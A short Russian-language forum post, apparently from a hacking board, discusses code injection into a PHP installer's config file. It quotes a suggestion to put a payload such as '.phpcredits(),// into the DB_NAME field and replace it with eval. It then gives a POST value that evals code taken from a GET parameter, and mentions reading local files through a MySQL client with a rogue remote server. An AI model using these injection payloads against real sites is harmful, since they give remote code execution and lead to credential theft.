Показать сообщение отдельно

  #8  
Старый 25.09.2017, 15:41
SooLFaa
Guest
Сообщений: n/a
Провел на форуме:
187765

Репутация: 154
По умолчанию

Цитата:
Сообщение от crlf  
crlf said:

Если конфиг точно пишется в файл, то можно попробовать записать
DB_NAME
так:
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#DD0000"]'.phpcredits(),//
[/COLOR][/COLOR] 
Если при обращении к конфигу выведется
phpcredits
, то можно заменить его на
eval
. Но скорее всего кавычка будет эскейпиться.
Может писать все креды. Поэтому есть смысл пробовать вариант инсталла на удалённый сервер. И чтение локальных файлов на мускул клиенте, если пых старенький.
Не мне тебя учить, что можно и без кавычки обойтись. Поэтому просто дополню:

Вариантов куча, один из.

Например постом отправляем

Код:
Code:
cmd=print(eval(current($_GET)));print(____);die;
А в гет

Код:
Code:
/index.php?anyname=phpcredits();
 
Ответить с цитированием